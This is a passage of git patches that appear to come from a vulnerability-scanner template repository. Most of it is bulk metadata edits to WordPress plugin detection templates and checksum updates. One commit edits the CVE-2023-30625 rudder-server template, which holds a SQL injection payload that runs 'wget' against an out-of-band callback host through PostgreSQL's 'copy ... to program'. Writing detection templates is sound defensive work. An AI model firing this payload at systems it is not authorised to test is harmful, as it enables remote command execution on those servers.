   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 48b3253a7e6fb42c0d23bc32cb7a37dfde16a14f Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Sun, 1 Oct 2023 13:59:50 +0530
Subject: [PATCH 0628/1090] added additional matcher

---
 http/cves/2023/CVE-2023-30625.yaml | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml
index 89822fbaa0..d7207d1821 100644
--- a/http/cves/2023/CVE-2023-30625.yaml
+++ b/http/cves/2023/CVE-2023-30625.yaml
@@ -5,10 +5,10 @@ info:
   author: gy741
   severity: high
   description: |
-    rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
+    Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625
     - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -17,7 +17,7 @@ info:
     epss-score: 0.010870000
     epss-percentile: 0.826540000
     cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*
-  tags: rudder-server,rudderstack,cve,cve2023
+  tags: cve,cve2023,rudder-server,rudderstack
 
 variables:
   cmd: "wget {{interactsh-url}}"
@@ -30,8 +30,14 @@ requests:
 
         {"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}
 
+    matchers-condition: and
     matchers:
       - type: word
-        part: interactsh_protocol # Confirms the DNS Interaction
+        part: body
         words:
-          - "dns"
+          - "error getting pending"
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
\ No newline at end of file

From f4f962a7a8058310a24491bb1819adc6a8feddac Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 08:40:50 +0000
Subject: [PATCH 0630/1090] Auto Generated Templates Checksum [Sun Oct  1
 08:40:50 UTC 2023] :robot:

---
 templates-checksum.txt | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 919cf3a18d..c51348fb35 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -382,7 +382,7 @@ helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f9
 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b
 helpers/wordpress/plugins/breeze.txt:7277d832c4a280d1c4cd0f4bf3169bf93d46d49e
 helpers/wordpress/plugins/broken-link-checker.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0
-helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea
+helpers/wordpress/plugins/child-theme-configurator.txt:cd33f7fb7f78c2a8e69fb30b7a69764612452320
 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f
 helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693
 helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:a9ea03b69a8a6f65d4bfc303872069ac5070fa1c
@@ -4298,7 +4298,7 @@ http/miscellaneous/netflix-conductor-version.yaml:58e842f74840a188b1d01b220162de
 http/miscellaneous/ntlm-directories.yaml:f5c3bab9fa3ac6238150af38b7c142e5bb4fd951
 http/miscellaneous/old-copyright.yaml:f2304cbcb45cc844183f11542421f305b22db5fd
 http/miscellaneous/options-method.yaml:99929d85d875946d3debe94d08fcaeb41548d629
-http/miscellaneous/rdap-whois.yaml:8f6fd0e2c818826c694da87377499fa47bfea6b1
+http/miscellaneous/rdap-whois.yaml:67e3aa1db8caeaf80dcd680e6149164b5eef3fa7
 http/miscellaneous/robots-txt-endpoint.yaml:77a2aecea8dd753215ede1443d94a11144636610
 http/miscellaneous/robots-txt.yaml:43b0f22528ebff24084bee1b8542d3eaa45ee3e8
 http/miscellaneous/security-txt.yaml:4270d144c5ec8423a0dfef2a6a0399b6dfe0c0fe
@@ -7206,7 +7206,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:4a30f62f8d3766b257829e95cfb25d5e83080874
+templates-checksum.txt:895d3dd994a3f786450c261eb7b7a7565c3e3cb5
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From d52def23300afb22bdf33e16d6bdcb0f488abae2 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sun, 1 Oct 2023 08:42:42 +0000
Subject: [PATCH 0631/1090] TemplateMan Update [Sun Oct  1 08:42:42 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
